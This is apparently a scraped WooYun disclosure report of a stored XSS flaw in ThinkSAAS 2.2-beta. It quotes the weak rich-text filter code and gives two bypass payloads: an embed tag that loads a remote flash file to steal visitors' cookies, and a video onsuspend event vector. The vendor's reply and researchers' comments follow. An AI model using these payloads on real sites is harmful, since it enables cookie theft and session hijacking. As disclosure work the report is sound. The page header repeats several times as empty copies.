ThinkSAAS 2.2-beta 存储型XSS | wooyun-2014-063398| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-063398

漏洞标题：ThinkSAAS 2.2-beta 存储型XSS

漏洞作者： mramydnei

提交时间：2014-06-03 19:05

修复时间：2014-09-01 19:06

公开时间：2014-09-01 19:06

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-06-03：细节已通知厂商并且等待厂商处理中
2014-06-03：厂商已经确认，细节仅向厂商公开
2014-06-06：细节向第三方安全合作伙伴开放
2014-07-28：细节向核心白帽子及相关领域专家公开
2014-08-07：细节向普通白帽子公开
2014-08-17：细节向实习白帽子公开
2014-09-01：细节向公众公开

简要描述：

富文本过滤不严格导致可植入恶意脚本盗取用户cookies

详细说明：

对比了一下 WooYun: Thinksaas存储型XSS ，发现确实更新了。我就无耻的来了。
下面是对富文本过滤的代码片段：

function cleanJs($text) {
	$text = trim ( $text );
	//$text = stripslashes ( $text );
	// å®Œå…¨è¿‡æ»¤æ³¨é‡Š
	$text = preg_replace ( '/<!--?.*-->/', '', $text );
	// å®Œå…¨è¿‡æ»¤åŠ¨æ€ä»£ç 
	$text = preg_replace ( '/<\?|\?>/', '', $text );
	// å®Œå…¨è¿‡æ»¤js
	$text = preg_replace ( '/<script?.*\/script>/', '', $text );
	// è¿‡æ»¤å¤šä½™html
	$text = preg_replace ( '/<\/?(html|head|meta|link|base|body|title|style|script|form|iframe|frame|frameset|math|maction|marquee)[^><]*>/i', '', $text );
	// è¿‡æ»¤onäº‹ä»¶lang js
	while ( preg_match ( '/(<[^><]+)(data|onfinish|onmouse|onexit|onerror|onclick|onkey|onload|onchange|onfocus|onblur|onscroll)[^><]+/i', $text, $mat ) ) {
		$text = str_replace ( $mat [0], $mat [1], $text );
	}
	while ( preg_match ( '/(<[^><]+)(window\.|javascript:|js:|about:|file:|document\.|vbs:|cookie)([^><]*)/i', $text, $mat ) ) {
		$text = str_replace ( $mat [0], $mat [1] . $mat [3], $text );
	}
	return $text;
}

这个Filter依然存在很多问题，比如我们可以植入恶意的flash文件来盗取访问该页面的其它用户的cookies。该问题已在官网上重现。

<embed allowScriptAccess=always src=http://x55.me/x55.swf>

除此之外看到有人说，对于这个Filter已经没有什么好用的event handler可以用来触发xss了，我觉得好像也不是。所以再提供一种方案：

<video onsuspend=alert(10) src=//x55.me/1.ogg>

上面的XSS Vector在chrome/firefox/Opera下有效。

漏洞证明：

攻击者在目标站插入恶意代码：

用户访问被插入恶意代码的页面时cookies被发送到攻击者的收信端：

攻击者成功获取受害者的cookies：

修复方案：

完善过滤规则

版权声明：转载请注明来源 mramydnei@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：6

确认时间：2014-06-03 22:16

厂商回复：

请给出过滤方案代码，谢谢。

漏洞评价：

2014-06-03 19:37 | BadCat ( 实习白帽子 | Rank:81 漏洞数:21 | 悲剧的我什么都不会)

@疯狗为什么....http://www.wooyun.org/bugs/wooyun-2014-063319/trace/abe9cb2969716d56fd9f12c6623822e7
2014-06-04 07:44 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

@thinksaas.cn 写这个过滤方案，可能比你写CMS还要费几倍的，甚至几十倍的时间恕我给不了……
2014-06-04 10:37 | BadCat ( 实习白帽子 | Rank:81 漏洞数:21 | 悲剧的我什么都不会)

@mramydnei 话说上次发现的XSS，他们也只是草草修复一下而已...就过滤了我XSS代码用的 <marquee> 和 onscroll

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-063398

漏洞标题：ThinkSAAS 2.2-beta 存储型XSS

相关厂商：thinksaas.cn

漏洞作者： mramydnei

提交时间：2014-06-03 19:05

修复时间：2014-09-01 19:06

公开时间：2014-09-01 19:06

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 mramydnei@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-063398

漏洞标题：ThinkSAAS 2.2-beta 存储型XSS

相关厂商：thinksaas.cn

漏洞作者： mramydnei

提交时间：2014-06-03 19:05

修复时间：2014-09-01 19:06

公开时间：2014-09-01 19:06

漏洞类型：xss跨站脚本攻击

危害等级：中

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-063398"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 mramydnei@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：